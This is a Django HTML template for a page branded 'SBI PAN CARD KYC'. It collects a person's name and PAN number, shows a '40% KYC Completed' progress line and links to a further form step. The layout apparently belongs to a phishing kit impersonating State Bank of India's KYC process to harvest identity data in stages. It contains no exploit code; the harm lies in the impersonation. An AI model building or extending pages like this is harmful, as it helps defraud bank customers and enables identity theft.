{% extends 'base.html' %}{% load static %}{% block styleArea %} {% endblock %}{% block contentArea %}

<div class="ugf-main-wrap ugf-bg">
    <img src="{% static 'images/9.jpg' %}" alt="">

    <div class="ugf-header">
        <div class="logo">
            <a href="#"><img src="{% static 'images/2.jpg' %}" class="img-fluid" alt=""></a>
        </div>
    </div>
    <div class="container">
        <div class="row">
            <div class="col">
                <div class="container"><br><br>
                    <div class="content-wrap">
                        <div class="ugf-form-block-header">
                        </div>
                        <div class="ugf-input-block">
                            <form action="#" method="POST">
                                {% csrf_token %}
                                <div>
                                    <div>
                                        <h3 style="color: black;">Welcome TO SBI PAN CARD KYC</h3>
                                        <div class="form-group" style="color: black;">
                                            <label for="name" style="margin-right: 340px;">Name*</label><br>
                                            <input type="text" class="form-control" name="name" id="inputText" placeholder="Enter pan Name" required>
                                        </div>
                                        <div class="form-group" style="color: black;">
                                            <label for="name" style="margin-right: 340px;">PanNumber*</label><br>
                                            <input type="name" name="card" class="form-control" id="inputCard" placeholder="Enter pan number" required><br>
                                            <h5>40% KYC Completed</h5>

                                        </div>

                                        <button type="submit" class="btn"> <a href="{% url 'websites:form1' %}"></a>Confirm</button>
                            </form>
                            </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        {% endblock %}